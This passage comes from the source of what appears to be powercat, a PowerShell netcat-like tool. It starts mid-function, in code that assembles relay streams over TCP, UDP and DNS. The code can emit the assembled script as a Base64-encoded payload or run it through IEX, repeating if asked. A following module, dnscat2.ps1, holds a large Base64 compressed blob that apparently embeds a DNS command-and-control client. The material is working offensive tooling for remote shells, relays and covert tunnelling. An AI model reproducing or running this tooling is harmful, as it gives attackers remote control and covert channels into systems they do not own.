("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} else{return "Bad relay format."} } if($r.split(":")[0].ToLower() -eq "dns") { Write-Verbose "Set Stream 2: DNS" $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") if($r.split(":").Count -eq 2){return "This feature is not available."} elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")} else{return "Bad relay format."} } elseif($r.split(":")[0].ToLower() -eq "tcp") { Write-Verbose "Set Stream 2: TCP" $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} else{return "Bad relay format."} } } else { Write-Verbose "Set Stream 2: Console" $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n") $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n") $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n") $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n") $InvokeString += ("@('" + $o + "')") } if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")} else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")} $InvokeString = ($FunctionString + $InvokeString) ########## GENERATE PAYLOAD ########## ########## RETURN GENERATED PAYLOADS ########## if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))} elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString} ########## RETURN GENERATED PAYLOADS ########## ########## EXECUTION ########## $Output = $null try { if($rep) { while($True) { $Output += IEX $InvokeString Start-Sleep -s 2 Write-Verbose "Repetition Enabled: Restarting..." } } else { $Output += IEX $InvokeString } } finally { if($Output -ne $null) { if($of -eq ""){$Output} else{[io.file]::WriteAllBytes($of,$Output)} } } ########## EXECUTION ########## } ================================================ FILE: modules/dnscat2.ps1 ================================================ $EncodedCompressedFile = @' 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